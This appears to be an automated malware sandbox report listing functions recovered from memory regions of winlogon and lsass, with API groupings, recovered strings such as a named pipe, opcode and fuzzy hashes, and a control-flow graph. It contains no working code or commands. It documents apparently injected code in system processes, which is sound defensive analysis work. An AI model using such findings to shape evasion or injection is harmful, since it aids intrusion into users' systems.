                            Uniqueness Score: -1.00%

                            Function 000001AFDDD086EC Relevance: 15.2, APIs: 10, Instructions: 231COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_release_startup_lock
                            • String ID:
                            • API String ID: 2904100720-0
                            • Opcode ID: b9fba9ebf33b7b9b553ca47caecb391e479f2e9c425bbd4e168cab60532678ed
                            • Instruction ID: 6a09d110d356032e916ea35ee3ac232cbdda02acbd041d88e2c77de9dd09a596
                            • Opcode Fuzzy Hash: b9fba9ebf33b7b9b553ca47caecb391e479f2e9c425bbd4e168cab60532678ed
                            • Instruction Fuzzy Hash: 9181B23170364186FE56BBE6A4413F96A94B7C778CF68423D9948437D6DA38C84FA703
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001AFDDCD7AEC Relevance: 15.2, APIs: 10, Instructions: 231COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 744 1afddcd7aec-1afddcd7af2 745 1afddcd7b2d-1afddcd7b37 744->745 746 1afddcd7af4-1afddcd7af7 744->746 747 1afddcd7c54-1afddcd7c69 745->747 748 1afddcd7af9-1afddcd7afc 746->748 749 1afddcd7b21-1afddcd7b60 call 1afddcd82c8 746->749 753 1afddcd7c6b 747->753 754 1afddcd7c78-1afddcd7c92 call 1afddcd815c 747->754 751 1afddcd7afe-1afddcd7b01 748->751 752 1afddcd7b14 __scrt_dllmain_crt_thread_attach 748->752 767 1afddcd7c2e 749->767 768 1afddcd7b66-1afddcd7b7b call 1afddcd815c 749->768 759 1afddcd7b0d-1afddcd7b12 call 1afddcd820c 751->759 760 1afddcd7b03-1afddcd7b0c 751->760 757 1afddcd7b19-1afddcd7b20 752->757 755 1afddcd7c6d-1afddcd7c77 753->755 765 1afddcd7ccb-1afddcd7cfc call 1afddcd8498 754->765 766 1afddcd7c94-1afddcd7cc9 call 1afddcd8284 call 1afddcd8124 call 1afddcd8620 call 1afddcd8438 call 1afddcd845c call 1afddcd82b4 754->766 759->757 776 1afddcd7cfe-1afddcd7d04 765->776 777 1afddcd7d0d-1afddcd7d13 765->777 766->755 771 1afddcd7c30-1afddcd7c45 767->771 779 1afddcd7c46-1afddcd7c53 call 1afddcd8498 768->779 780 1afddcd7b81-1afddcd7b92 call 1afddcd81cc 768->780 776->777 781 1afddcd7d06-1afddcd7d08 776->781 782 1afddcd7d5a-1afddcd7d70 call 1afddcd3320 777->782 783 1afddcd7d15-1afddcd7d1f 777->783 779->747 794 1afddcd7b94-1afddcd7bb8 call 1afddcd85e4 call 1afddcd8114 call 1afddcd8140 call 1afddcd9d00 780->794 795 1afddcd7be3-1afddcd7bed call 1afddcd8438 780->795 788 1afddcd7dfd-1afddcd7e0a 781->788 801 1afddcd7daa-1afddcd7dac 782->801 802 1afddcd7d72-1afddcd7d74 782->802 789 1afddcd7d2b-1afddcd7d39 call 1afddce3748 783->789 790 1afddcd7d21-1afddcd7d29 783->790 797 1afddcd7d3f-1afddcd7d54 call 1afddcd7aec 789->797 808 1afddcd7df3-1afddcd7dfb 789->808 790->797 794->795 847 1afddcd7bba-1afddcd7bc1 __scrt_dllmain_after_initialize_c 794->847 795->767 815 1afddcd7bef-1afddcd7bfb call 1afddcd8488 795->815 797->782 797->808 810 1afddcd7dae-1afddcd7db1 801->810 811 1afddcd7db3-1afddcd7dc8 call 1afddcd7aec 801->811 802->808 809 1afddcd7d76-1afddcd7d98 call 1afddcd3320 call 1afddcd7c54 802->809 808->788 809->808 841 1afddcd7d9a-1afddcd7da8 call 1afddce3748 809->841 810->808 810->811 811->808 826 1afddcd7dca-1afddcd7dd4 811->826 834 1afddcd7bfd-1afddcd7c07 call 1afddcd83a0 815->834 835 1afddcd7c21-1afddcd7c2c 815->835 832 1afddcd7dd6-1afddcd7ddd 826->832 833 1afddcd7ddf-1afddcd7def call 1afddce3748 826->833 832->808 833->808 834->835 846 1afddcd7c09-1afddcd7c17 834->846 835->771 841->808 846->835 847->795 849 1afddcd7bc3-1afddcd7be0 call 1afddcd9c9c 847->849 849->795
                            APIs
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508622976.000001AFDDCD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDCD0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddcd0000_winlogon.jbxd
                            Similarity
                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_release_startup_lock
                            • String ID:
                            • API String ID: 2904100720-0
                            • Opcode ID: 6b35b8212f2284779f27ca5c5da834cb643104800c9213282adef094c912fac4
                            • Instruction ID: 1e762ff9b906580a599c249e70862c3eaa675176dbb0eda7254397c2f059be5a
                            • Opcode Fuzzy Hash: 6b35b8212f2284779f27ca5c5da834cb643104800c9213282adef094c912fac4
                            • Instruction Fuzzy Hash: E681D17170368196FA63ABE99C413E962D0AB87780F08413D9ACA537D6DB39C84FC712
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001AFDDD03C30 Relevance: 13.7, APIs: 8, Strings: 1, Instructions: 221stringCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: lstrcmplstrcmpi$_invalid_parameter_noinfo
                            • String ID: nslook
                            • API String ID: 125796670-925916808
                            • Opcode ID: e4eebad3085524bd7cc81e0496f3330c115c18a0ef6aff813f55017ca675ca3a
                            • Instruction ID: 564dc93cba68000b14c5f33c08b8aff170c7fd74b0c9f4e9f289ec3b9c1b2c31
                            • Opcode Fuzzy Hash: e4eebad3085524bd7cc81e0496f3330c115c18a0ef6aff813f55017ca675ca3a
                            • Instruction Fuzzy Hash: DE81DB76303A4186EF668FE6D5443B92364F782B88F05423DCB0A47AD0DB35D41BE352
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001AFDDD011C0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135stringregistryCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: EnumInfoQueryValuelstrcmplstrcmpilstrcpylstrlen
                            • String ID: d
                            • API String ID: 760382566-2564639436
                            • Opcode ID: 58b6d380fd7a19ccaffb75ac57d677b01951afe1390cb8a1d5f168405babf2dd
                            • Instruction ID: 18ce0ad3eb8714951c01e411df11b3c20a28feb3eb85d7b88ac85e72812145ee
                            • Opcode Fuzzy Hash: 58b6d380fd7a19ccaffb75ac57d677b01951afe1390cb8a1d5f168405babf2dd
                            • Instruction Fuzzy Hash: 77516172306B8186EB55DB91F5403EE73A9F3C9B84F404029DB9947B98DF38D06ADB01
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001AFDDD044F0 Relevance: 10.6, APIs: 7, Instructions: 125threadCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: Current$ProcessProtectThreadVirtual$HandleModuleTerminate
                            • String ID:
                            • API String ID: 23076575-0
                            • Opcode ID: 5580002a2b36d1ec19da4d38e3baa73b2c19332edb1061c5b354992008b38483
                            • Instruction ID: 632377a80ea8a0f5ae15f645c7ca671053f411d7eb6597cec96c792c6921dcde
                            • Opcode Fuzzy Hash: 5580002a2b36d1ec19da4d38e3baa73b2c19332edb1061c5b354992008b38483
                            • Instruction Fuzzy Hash: 5E61F871327B4282EE52DBD5E8517E927A4FB86748F84103DE94D067E9EF28C00ED742
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001AFDDD0A140 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86libraryloaderCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: Library$Load$AddressErrorFreeLastProc
                            • String ID: api-ms-
                            • API String ID: 2559590344-2084034818
                            • Opcode ID: 76b065093d340fa5aa374eaa269705a9f04a9f25d7b6574202371576915819bd
                            • Instruction ID: 567beaadd5fe4ad5575b2337ac8c29b93a43c4ddc9d957b24ee5bb696a616a7b
                            • Opcode Fuzzy Hash: 76b065093d340fa5aa374eaa269705a9f04a9f25d7b6574202371576915819bd
                            • Instruction Fuzzy Hash: B931C73235774195EE239BD2A800BF92398F796B68F49653DDD29077D5EF38C04A9302
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001AFDDD02E38 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75stringCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: lstrcmpi$_invalid_parameter_noinfolstrcatlstrcpy
                            • String ID: \\.\pipe\$nslook
                            • API String ID: 1773417096-2374292202
                            • Opcode ID: 71d271135564fef6ce2879b451260b98d48cbe5236b6da59abfcb7c1adabd234
                            • Instruction ID: 064856c7aedb696d55f5fe50187f8b7233cfcad3f41a0e327785bf44722cf69b
                            • Opcode Fuzzy Hash: 71d271135564fef6ce2879b451260b98d48cbe5236b6da59abfcb7c1adabd234
                            • Instruction Fuzzy Hash: 7C31607230364186EE169BE6D5507F86B66F78AB8DF544039CE0A476D8DF34C54EE302
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001AFDDD027E9 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74stringCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: lstrcmpi$_invalid_parameter_noinfolstrcatlstrcpy
                            • String ID: \\.\pipe\$nslook
                            • API String ID: 1773417096-2374292202
                            • Opcode ID: a4f58ddb0ec7a1ac9b520ccabc6490d736c06cf39181273cdad02b7e49ae0e4c
                            • Instruction ID: bd352007f468cce5778ea594c8893fee73506a8693bb9914e72b408b6f6fb868
                            • Opcode Fuzzy Hash: a4f58ddb0ec7a1ac9b520ccabc6490d736c06cf39181273cdad02b7e49ae0e4c
                            • Instruction Fuzzy Hash: 5131803A30768192EE669BE1E4547FD6761F786B89F444029CA0A036D8DF38D54EE702
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001AFDDD1295C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                            • String ID: CONOUT$
                            • API String ID: 3230265001-3130406586
                            • Opcode ID: 27f30534f6eca3e4b76c3b3a5b2f55ab59f44af5952072018eae61c579aa4f13
                            • Instruction ID: 33222000fccaacbce4f89624b909a2fb54468e58bb1b9d00d34356dfe69b2a33
                            • Opcode Fuzzy Hash: 27f30534f6eca3e4b76c3b3a5b2f55ab59f44af5952072018eae61c579aa4f13
                            • Instruction Fuzzy Hash: 75119333312B4286EB518BD2F84475966A8F389BE8F144238EA5D877E8CF38C54E8745
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001AFDDD019F0 Relevance: 10.3, APIs: 8, Instructions: 286stringCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: lstrcmpi
                            • String ID:
                            • API String ID: 1586166983-0
                            • Opcode ID: ce154f4429541e23164c92ae9c75826ca88459982102bc68580caac79a690ae3
                            • Instruction ID: d029227b87d97915c65a5c7e952fb2796850ae1ca214e6555b56cce8bc429d42
                            • Opcode Fuzzy Hash: ce154f4429541e23164c92ae9c75826ca88459982102bc68580caac79a690ae3
                            • Instruction Fuzzy Hash: 11C1533671360087EF62CFDAD0807B973A1F3D6B88F958029DA09837D8DB35D89A9751
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001AFDDD0ACFC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: AddressFreeHandleLibraryModuleProc
                            • String ID: CorExitProcess$mscoree.dll
                            • API String ID: 4061214504-1276376045
                            • Opcode ID: c0888126ef0aec4d50884ac5792c080854fdb6b5603553d00752df973eadfd71
                            • Instruction ID: d85413ce1d58126bfb42fe99aad1d5aa8599cec1380482a3386a027090e3cca6
                            • Opcode Fuzzy Hash: c0888126ef0aec4d50884ac5792c080854fdb6b5603553d00752df973eadfd71
                            • Instruction Fuzzy Hash: D9F0127231364282FF569FE1E4843E92368EB89759F44203DA90B4A5E5DF3CC58EC752
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001AFDDD1194C Relevance: 7.7, APIs: 5, Instructions: 203COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                            • String ID:
                            • API String ID: 2210144848-0
                            • Opcode ID: eca7fc05c2f44761dbcadaf0bbc50f34caa22c00f8231d2c3b604388e5753dc9
                            • Instruction ID: fada62c1b21bbca1d988ad8866705df4913a3099c42c3af81d7504fbb9f6a211
                            • Opcode Fuzzy Hash: eca7fc05c2f44761dbcadaf0bbc50f34caa22c00f8231d2c3b604388e5753dc9
                            • Instruction Fuzzy Hash: 8881AE33713A1289FF229BE5D8407ED6BA8F746B9CF444239DA0A536D5DA34844FC712
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001AFDDD06620 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: CurrentThread
                            • String ID:
                            • API String ID: 2882836952-0
                            • Opcode ID: 0d64e0ab7572ed2ee22c40ee5596af816ffd64d1a05f57047e0db58f1c18debd
                            • Instruction ID: dde1c718bea41b3872b11c08cc23819d8f050d480778f959ce451347d46f2023
                            • Opcode Fuzzy Hash: 0d64e0ab7572ed2ee22c40ee5596af816ffd64d1a05f57047e0db58f1c18debd
                            • Instruction Fuzzy Hash: 7861DA3261BA80C7EB618B95E44176AB7A4F3C9748F500129FA8D43BE8DB7CC549DB02
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001AFDDD12C78 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: _set_statfp
                            • String ID:
                            • API String ID: 1156100317-0
                            • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                            • Instruction ID: cc0e6aa70c64fa1fb9871bfe7337b17ff6d0d8017f9ace4946a188b2bf8f1e88
                            • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                            • Instruction Fuzzy Hash: 1C119433753A4301FF5611E8E8577E51849EB5737CF54063CAF66167EE8A26884B4207
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001AFDDCE2078 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508622976.000001AFDDCD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDCD0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddcd0000_winlogon.jbxd
                            Similarity
                            • API ID: _set_statfp
                            • String ID:
                            • API String ID: 1156100317-0
                            • Opcode ID: 7c8cf4f4356880d358edfb0bdf00968b5fd6df14598648be04d9af7c821d71cb
                            • Instruction ID: 9a5005ca0149a622bcbfe9212328a717b23ebe418a7c218701e4ef018b6ada71
                            • Opcode Fuzzy Hash: 7c8cf4f4356880d358edfb0bdf00968b5fd6df14598648be04d9af7c821d71cb
                            • Instruction Fuzzy Hash: 6411C1F2B57A4002F67A11E8D453BE5C0406B57370F08423CABE67B2D6CA2B8D8BD202
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001AFDDCDDD54 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 175COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508622976.000001AFDDCD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDCD0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddcd0000_winlogon.jbxd
                            Similarity
                            • API ID: _invalid_parameter_noinfo
                            • String ID: Dec$January$Oct
                            • API String ID: 3215553584-2670745533
                            • Opcode ID: 5e3f35654ae946a199acd0dab1e3d24a2855035388db7b56c0256662182ab222
                            • Instruction ID: 431692b53e5719ff494d713a10d9755451cd40553e64669349596e23b84580b4
                            • Opcode Fuzzy Hash: 5e3f35654ae946a199acd0dab1e3d24a2855035388db7b56c0256662182ab222
                            • Instruction Fuzzy Hash: 9C61A072B0374086FA679BD5AC503EA66A1E796784F10403DDACA13BD4FB38D84F8213
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001AFDDCD9A10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508622976.000001AFDDCD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDCD0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddcd0000_winlogon.jbxd
                            Similarity
                            • API ID: _invalid_parameter_noinfo
                            • String ID: r-dialogbox-l1-1-0
                            • API String ID: 3215553584-4250323851
                            • Opcode ID: 0c2568eed714bf13032a55bd6b1163a073a3bffa3452c1d7e2ab8017899a9a63
                            • Instruction ID: 8a968e75e2652b45e476cb65f0b2fa9e83f6bd7acc6eda74565218df30689e38
                            • Opcode Fuzzy Hash: 0c2568eed714bf13032a55bd6b1163a073a3bffa3452c1d7e2ab8017899a9a63
                            • Instruction Fuzzy Hash: 9C41237670378081EB369BD19C403FA7AA0A347BA4F554239EAC9077D5CE38C58BC702
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001AFDDD01000 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 105registryCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: EnumInfoQueryValue
                            • String ID: d
                            • API String ID: 918324718-2564639436
                            • Opcode ID: 2b6f759017033bc42d1ee0350eeb4893f61cf903c5f23e249b9070065a49af58
                            • Instruction ID: 1a44b54b67769235c9634d2a71251d73bfbd3abcb78807a973e81b88e611af52
                            • Opcode Fuzzy Hash: 2b6f759017033bc42d1ee0350eeb4893f61cf903c5f23e249b9070065a49af58
                            • Instruction Fuzzy Hash: 0E41397230AB8096EB658B91F84039AB3A5F3CAB84F504529EB9943B58DF38D465DB01
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001AFDDD116F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: ErrorFileLastWrite
                            • String ID: U
                            • API String ID: 442123175-4171548499
                            • Opcode ID: bc4894b8380f827de51b153ff8dcd6fe6eccf43ce17c5514f992378ed3d9d4cf
                            • Instruction ID: f50353c2e63f78272b59be42bc0c6ce02e7e512a92cf7694df93f4e3d2eb207e
                            • Opcode Fuzzy Hash: bc4894b8380f827de51b153ff8dcd6fe6eccf43ce17c5514f992378ed3d9d4cf
                            • Instruction Fuzzy Hash: 7741D073316A4182EF219FA5E4443EAA7A8F399788F404139EE4D87788EB38C44AC741
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001AFDDD0C810 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: Stringtry_get_function
                            • String ID: LCMapStringEx
                            • API String ID: 2588686239-3893581201
                            • Opcode ID: 0650644c2c900b4814cbcd9bf92414a9b71a297e973e0b979cc5e0fd495833a0
                            • Instruction ID: 5b6939169f4ef5506958d9c10e691ff9f04027efa48362e0e0c3b077d0df604c
                            • Opcode Fuzzy Hash: 0650644c2c900b4814cbcd9bf92414a9b71a297e973e0b979cc5e0fd495833a0
                            • Instruction Fuzzy Hash: 93110B36709B8086DB65CB95B84029AB7A8F7C9B84F54412AEE8D83B99DF38C455CB01
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001AFDDD09CE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: ExceptionFileHeaderRaise
                            • String ID: csm
                            • API String ID: 2573137834-1018135373
                            • Opcode ID: 3bc9577514421139fbef7d5dc897fc9f2b2065d60f0eafa8fa7f61b963509bf2
                            • Instruction ID: ef7da00e5fdc505a53e48b1a5366db48bfbc70b2ceaa84c8faf4c4a601d51945
                            • Opcode Fuzzy Hash: 3bc9577514421139fbef7d5dc897fc9f2b2065d60f0eafa8fa7f61b963509bf2
                            • Instruction Fuzzy Hash: BB110D32216B4482EB118F95F44079977A5F789B98F584225EF8D077A8DF38C556CB40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001AFDDD0C7AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: CountCriticalInitializeSectionSpintry_get_function
                            • String ID: InitializeCriticalSectionEx
                            • API String ID: 539475747-3084827643
                            • Opcode ID: 8e6a3fe44e534738534d9a01dabf262b013e09a9fbdd3e3c06b7ef608cce99ba
                            • Instruction ID: c4afb344ce288393bc91545898738fa608b72c3e5a75de42af0a843adea9db2d
                            • Opcode Fuzzy Hash: 8e6a3fe44e534738534d9a01dabf262b013e09a9fbdd3e3c06b7ef608cce99ba
                            • Instruction Fuzzy Hash: 93F05E3631379081EE1A9BC6B9406E52268E789B88F484039E95917BD9CF38C48FC742
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000001AFDDD0C758 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: Valuetry_get_function
                            • String ID: FlsSetValue
                            • API String ID: 738293619-3750699315
                            • Opcode ID: 3752bcc65c7c5609300ea25ac4cfde0f10294ffc29cf2283e288bad232694535
                            • Instruction ID: b618eeded865b2ba63fad67f49416b7abbeb1aa83fd95d95196119805e1298e3
                            • Opcode Fuzzy Hash: 3752bcc65c7c5609300ea25ac4cfde0f10294ffc29cf2283e288bad232694535
                            • Instruction Fuzzy Hash: DCE0927630364191EF1A4BD4F8406E8232AE7CA788F48403ED90A073D5CE38C88FC302
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Executed Functions

                            Function 00000240B2BB3F20 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90threadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: CurrentFileModuleNameProcessProtectVirtual$CreateFindHandlePathThread_invalid_parameter_noinfo
                            • String ID: nslook
                            • API String ID: 2570614652-925916808
                            • Opcode ID: f1d8bc74bf052771e52778655c87fe18c3546f35a08540481f72330a9496183f
                            • Instruction ID: dcc2e83fdd852ef67f17a6b0ccffd3eb0ce3fa7ff6a42ce8c6185e14426c83e4
                            • Opcode Fuzzy Hash: f1d8bc74bf052771e52778655c87fe18c3546f35a08540481f72330a9496183f
                            • Instruction Fuzzy Hash: B5414925615B4082FB689B21F4ACB9A27B1F74CB88F44442DDB8A4A794EF7DC188C748
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00000240B2BB1ED0 Relevance: 3.0, APIs: 2, Instructions: 18sleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: Open$Close$Sleep
                            • String ID:
                            • API String ID: 3308825301-0
                            • Opcode ID: 0335e562c384ed4ab1b4dfda930fd32856ca0767eaff0783c008b7edfd4736cd
                            • Instruction ID: fe619fbb74f11101744f5577c4ddf1baf52b86de80cc706a6918003e6afd4ee2
